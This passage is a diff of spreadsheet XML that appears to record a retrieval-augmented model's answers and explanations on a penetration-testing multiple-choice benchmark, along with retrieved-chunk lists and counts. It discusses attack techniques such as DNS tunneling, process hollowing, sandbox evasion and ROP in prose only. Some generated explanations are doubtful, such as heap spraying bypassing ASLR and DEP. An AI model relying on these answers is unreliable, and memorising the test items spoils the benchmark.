-manipulate users into divulging confidential information, is more about manipulating people to gain access to
-confidential data rather than finding technical vulnerabilities in web applications. Option 3, implementing denial
-of service attacks to disrupt traffic to the network, seeks to disrupt service but does not help in identifying
-specific security flaws that can be exploited for gaining unauthorized access or data leakage.</t>
+in itself identify vulnerabilities in web applications. Option 2, employing social engineering tactics to manipulate
+users into divulging confidential information, is more applicable to gaining access through human interaction
+rather than directly identifying vulnerabilities in a web application. Option 3, implementing denial of service
+attacks to disrupt traffic to the network, while it can be used to distract or disable defenses, does not directly
+identify vulnerabilities in the target's web applications.</t>
         </is>
       </c>
       <c r="G184" t="inlineStr">
@@ -12804,21 +11858,16 @@
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c0ed16e1-fecd-4bdf-8424-414dcf8f986a, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I184" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J184" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K184" t="inlineStr">
         <is>
@@ -12857,7 +11906,7 @@
       <c r="F185" t="inlineStr">
         <is>
           <t>Answer: 'Obtaining and exploiting physical access control weaknesses'
-Explanation: When facing a highly secure corporate network that does not exhibit direct internet-facing vulnerabilities, red teams must look for alternative entry vectors that bypass traditional network defenses. Among the options given, 'Obtaining and exploiting physical access control weaknesses' is typically the most effective initial attack vector in this scenario. Exploiting physical security, such as badge systems or physical network access points, can provide the red team with a significant foothold inside a secure environment, often bypassing network-based defenses that protect against external digital threats. 'Setting up incremented privileged access' and 'Exploiting server-side request forgery (SSRF) vulnerabilities' require a level of network access or system control that would not typically be available as an initial vector in such secure environments. "Injecting malware into the company's software repositories" could potentially work, but it relies on the attacker having already gained some level of access to the network, which contradicts the premise of finding an effective initial vector.</t>
+Explanation: When facing a highly secure corporate network that does not exhibit direct internet-facing vulnerabilities, red teams must look for alternative entry vectors that bypass traditional network defenses. Among the options given, 'Obtaining and exploiting physical access control weaknesses' is typically the most effective initial attack vector in this scenario. Exploiting physical security, such as badge systems or physical network access points, can provide the red team with a significant foothold inside a secure environment, often bypassing network-based defenses that protect against external digital threats. 'Setting up incremented privileged access' and 'Exploiting server-side request forgery (SSRF) vulnerabilities' are techniques primarily used for lateral movement or exploiting specific web application flaws, not for initial penetration in a highly secure network lacking direct internet vulnerabilities.</t>
         </is>
       </c>
       <c r="G185" t="inlineStr">
@@ -12871,21 +11920,16 @@
 preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 53d92d7b-c5d1-4bbd-bdf4-b29c029a1b9e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I185" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J185" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K185" t="inlineStr">
         <is>
@@ -12924,7 +11968,7 @@
       <c r="F186" t="inlineStr">
         <is>
           <t>Answer: Nmap aggressive scan with OS detection
-Explanation: The correct answer is 'Nmap aggressive scan with OS detection'. This choice is appropriate because Nmap (Network Mapper) is a security scanner used to discover hosts and services on a computer network. By using an aggressive scan, red teamers can quickly identify live hosts, open ports, and running services on the corporate network. The OS detection feature helps in understanding the operating systems of these hosts, which can be useful for further exploitation if needed. Wireshark packet capture requires prior access to the network and is not an initial activity. Social engineering with a crafted phishing email targets individual user credentials or direct access abuse rather than system-wide reconnaissance. SQL injection in the login form of the application assumes prior knowledge of web applications' specifics which might not yet be known in the early stages of an engagement.</t>
+Explanation: The correct answer is 'Nmap aggressive scan with OS detection'. This choice is appropriate because Nmap (Network Mapper) is a security scanner used to discover hosts and services on a computer network. An aggressive scan with OS detection can provide red teamers with the network topology, live hosts, open ports, and running services on a corporate network. Wireshark packet capture can be useful for analyzing network traffic but doesn't necessarily provide the same level of information about hosts and services. Social engineering with a crafted phishing email is more focused on obtaining credentials or other sensitive information rather than mapping the network. SQL injection in the login form of an application could potentially reveal some information about the target system, but it is not as comprehensive as an Nmap scan for discovering the entire network topology and services.</t>
         </is>
       </c>
       <c r="G186" t="inlineStr">
@@ -12938,21 +11982,16 @@
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 02376962-c540-4738-9da7-8849a102ff34, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I186" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J186" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K186" t="inlineStr">
         <is>
@@ -13005,21 +12044,16 @@
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 6)
-return-to-libc-ret2libc.md (Chunk: 74893014-5ccd-42f3-a10b-87f1c09a7de1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 884a29d4-07cf-44d8-bf3a-5149b2c69f9a, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I187" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J187" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K187" t="inlineStr">
         <is>
@@ -13058,7 +12092,7 @@
       <c r="F188" t="inlineStr">
         <is>
           <t>Answer: Evading automated malware analysis tools by detecting virtual environments
-Explanation: Evading automated malware analysis tools by detecting virtual environments is an effective technique used by advanced malware to avoid detection and analysis when being examined in a typical virtualized security research environment. This method involves the malware identifying artifacts of virtualization, such as specific CPU or memory characteristics, and altering its behavior accordingly to evade detection.</t>
+Explanation: Evading automated malware analysis tools by detecting virtual environments is an effective technique used by advanced malware to avoid detection and analysis when being examined in a typical virtualized security research environment. This method involves the malware identifying artifacts of virtualization, such as specific CPU or memory patterns, and altering its behavior accordingly to remain undetected.</t>
         </is>
       </c>
       <c r="G188" t="inlineStr">
@@ -13072,21 +12106,16 @@
 preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 3)
 cowWhySo-pentest-redteam-steering.md (Chunk: 1341b7ef-18b4-4f51-93c8-22accef7ff54, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: dfa3f47d-5ca2-4a60-aa5e-cd08e2caa4b2, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I188" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J188" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K188" t="inlineStr">
         <is>
@@ -13125,7 +12154,7 @@
       <c r="F189" t="inlineStr">
         <is>
           <t>Answer: Buffer overflow
-Explanation: Buffer overflow attacks are specifically designed to exploit memory corruption vulnerabilities, allowing an attacker to execute unauthorized code on a target system. The other options - credential stuffing, cross-site scripting, and SQL injection - are different types of vulnerabilities or attacks that do not directly involve exploiting memory corruption for code execution.</t>
+Explanation: Buffer overflow attacks are specifically designed to exploit memory corruption vulnerabilities, allowing an attacker to execute unauthorized code on a target system. The other options listed - credential stuffing, cross-site scripting, and SQL injection - are different types of vulnerabilities that target different aspects of software or systems but do not directly relate to memory corruption exploitation for code execution.</t>
         </is>
       </c>
       <c r="G189" t="inlineStr">
@@ -13139,21 +12168,16 @@
 preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I189" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J189" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K189" t="inlineStr">
         <is>
@@ -13192,7 +12216,7 @@
       <c r="F190" t="inlineStr">
         <is>
           <t>Answer: DNS Tunneling
-Explanation: DNS Tunneling is the most effective choice for maintaining long-term, covert access to a target's network with minimal detection. This technique leverages DNS queries, which are commonly allowed through network firewalls, to exfiltrate data and maintain communication with a compromised host. DNS requests generally do not arouse suspicion making this method highly stealthy compared to more noisy methods. Reverse TCP Shell, while effective for backdoor access, tends to be more detectable due to the nature of the traffic patterns it creates. Zero-Day Exploits are useful for initial access but are not specifically suited for maintaining long-term access due to the risk of discovery and patching. Credential Stuffing is primarily a method used to gain initial access via stolen credentials and does not inherently provide a method for maintaining access or communicating covertly.</t>
+Explanation: In a red team operation, the goal is often to maintain long-term, covert access to a target's network with minimal detection. DNS tunneling is an effective technique for this purpose because it allows data transmission through DNS queries and responses, which are typically allowed outbound from most networks. This makes it difficult to detect as it blends in with normal network traffic. Additionally, DNS tunneling can be used to exfiltrate data or establish command-and-control channels without raising suspicion. While reverse TCP shells and zero-day exploits can also provide long-term access, they may be more easily detected due to their more overt nature. Credential stuffing, on the other hand, targets identity rather than software vulnerabilities and is not as effective for maintaining covert access in a red team operation.</t>
         </is>
       </c>
       <c r="G190" t="inlineStr">
@@ -13206,21 +12230,16 @@
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: daf8e21f-02d4-4b54-a85b-d026b81b3411, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 9de1e388-e5f2-4d4a-ae47-ac3a137f820e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 82ae08c9-82a2-44ed-9962-a5ff06bb1f9d, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: daf8e21f-02d4-4b54-a85b-d026b81b3411, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I190" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J190" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K190" t="inlineStr">
         <is>
@@ -13259,7 +12278,7 @@
       <c r="F191" t="inlineStr">
         <is>
           <t>Answer: Heartbleed Vulnerability (CVE-2014-0160)
-Explanation: The description of the vulnerability where memory contents are leaked to a client without authentication matches the characteristics of the Heartbleed vulnerability (CVE-2014-0160). Heartbleed is a critical security vulnerability in the OpenSSL cryptographic library that allows an attacker to steal information protected by SSL/TLS encryption. It enables the extraction of sensitive data, including private keys, usernames, passwords, and other confidential information from the server's memory without requiring any valid session or authentication.</t>
+Explanation: The description of the vulnerability where memory contents are leaked to a client without authentication matches the characteristics of the Heartbleed vulnerability (CVE-2014-0160). Heartbleed is a critical vulnerability in OpenSSL, which is a popular cryptographic library used for secure communication over the internet. It allows an attacker to steal information protected by SSL/TLS encryption, including sensitive data such as usernames, passwords, and private keys.</t>
         </is>
       </c>
       <c r="G191" t="inlineStr">
@@ -13273,21 +12292,16 @@
 preemware_pentestingeval.pdf (Chunk: 4803957c-c81b-46be-9e64-8d0fd54656f2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: dfa3f47d-5ca2-4a60-aa5e-cd08e2caa4b2, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I191" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J191" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K191" t="inlineStr">
         <is>
@@ -13326,7 +12340,7 @@
       <c r="F192" t="inlineStr">
         <is>
           <t>Answer: Metasploit Framework
-Explanation: The Metasploit Framework is specifically designed for developing and executing code against a remote target machine. It includes tools for crafting payloads, conducting social engineering attacks, and evasion techniques, making it integral for penetration testing in red team operations. Nessus is an automated vulnerability scanner, Burp Suite is predominantly used for web application security testing, and Wireshark is a network protocol analyzer.</t>
+Explanation: The Metasploit Framework is specifically designed for developing and executing code against a remote target machine. It includes tools for crafting payloads, conducting social engineering attacks, and evasion techniques, making it integral for penetration testing and red team operations aimed at exploiting known vulnerabilities in a remote server. While Nessus, Burp Suite, and Wireshark are all useful tools in their own right, they do not have the same focus on exploit development and execution as Metasploit Framework does.</t>
         </is>
       </c>
       <c r="G192" t="inlineStr">
@@ -13340,21 +12354,16 @@
 preemware_pentestingeval.pdf (Chunk: 94a5825c-3c24-4426-98b6-0f15dd480b28, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 76451418-5bee-4e13-b950-55a69470f2ad, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I192" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J192" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K192" t="inlineStr">
         <is>
@@ -13393,7 +12402,7 @@
       <c r="F193" t="inlineStr">
         <is>
           <t>Answer: Process Hollowing
-Explanation: Process Hollowing is a code injection technique that enables an attacker to execute arbitrary code in the address space of another process by replacing its executable image. This can evade detection and maintain persistence on the target system. Reflective DLL Injection involves injecting a DLL into the address space of another process, Heap Spraying prepares the memory layout for use-after-free vulnerability exploitation, and API Hooking intercepts API calls to modify their behavior. However, Process Hollowing is specifically designed to replace an executable image in the address space of a live process, making it the most effective technique for APT scenarios.</t>
+Explanation: Process Hollowing is a code injection technique that enables an attacker to execute arbitrary code in the address space of another process by replacing its executable image. This can evade detection as it appears as a legitimate and benign process to the system's monitoring tools. Reflective DLL Injection involves injecting a DLL from memory, Heap Spraying prepares a large segment of memory with malicious shellcode in anticipation of a vulnerability allowing execution of memory content, and API Hooking modifies the function pointers of an application to redirect its control flow.</t>
         </is>
       </c>
       <c r="G193" t="inlineStr">
@@ -13407,21 +12416,16 @@
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 958d7f7e-d213-4f52-a3d0-8804b4d8db4e, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: f3f8a348-f98c-4c8e-81ac-c6b7395dbefc, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 958d7f7e-d213-4f52-a3d0-8804b4d8db4e, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I193" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J193" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K193" t="inlineStr">
         <is>
@@ -13460,7 +12464,14 @@
       <c r="F194" t="inlineStr">
         <is>
           <t>Answer: ROP chain with environmental keying
-Explanation: The technique of 'ROP chain with environmental keying' is most effective in the context of an advanced persistent threat (APT) scenario. This method involves leveraging the specific characteristics or defenses of the target environment to adapt the malware's behavior, allowing it to avoid detection and mitigation efforts more effectively. Behavior-based intrusion detection systems rely on recognizing patterns of activity that are indicative of malicious behavior. By using environmental keying, the malware can change its behavior based on the specific environment it is in, making it harder for these systems to detect and flag it as malicious.</t>
+Explanation: The technique of 'ROP chain with environmental keying' is most effective in the context of an
+APT scenario for deploying a payload that maintains evasion against behavior-based intrusion detection systems.
+This method involves constructing a ROP (Return-Oriented Programming) chain that leverages specific
+environmental characteristics or defenses of the target system to execute malicious code without raising
+suspicion. By tailoring the payload to the unique environment, it becomes more difficult for intrusion detection
+systems to identify and flag the activity as malicious. Memory spray with NOP sleds, heap-based buffer overflow,
+and use-after-free vulnerability exploit are all valid techniques but do not inherently provide evasion against
+behavior-based intrusion detection systems in the same way that ROP chain with environmental keying does.</t>
         </is>
       </c>
       <c r="G194" t="inlineStr">
@@ -13474,21 +12485,16 @@
 preemware_pentestingeval.pdf (Chunk: f3f8a348-f98c-4c8e-81ac-c6b7395dbefc, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 076aff09-3415-41ea-8059-a0f52827a57d, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I194" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J194" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K194" t="inlineStr">
         <is>
@@ -13526,8 +12532,8 @@
       </c>
       <c r="F195" t="inlineStr">
         <is>
-          <t>Answer: ROP chaining
-Explanation: ROP chaining, or Return-Oriented Programming, is highly effective in modern exploit development for bypassing Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP). This technique manipulates the control flow of a program by executing small snippets of code already present in a program's memory (called 'gadgets'), effectively allowing an attacker to execute arbitrary code</t>
+          <t>Answer: Heap spraying
+Explanation: Heap spraying is the correct technique among the options for achieving reliable code execution in environments with strong ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention). This technique involves filling a specific area of memory, typically the heap, with carefully crafted data that can be manipulated to execute arbitrary code. Heap spraying is effective because it exploits the predictable nature of how objects are allocated and deallocated in the heap, allowing an attacker to control the execution flow and bypass ASLR and DEP protections.</t>
         </is>
       </c>
       <c r="G195" t="inlineStr">
@@ -13541,21 +12547,16 @@
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 9686cf15-5df0-49f8-9592-fef3f765639f, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I195" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
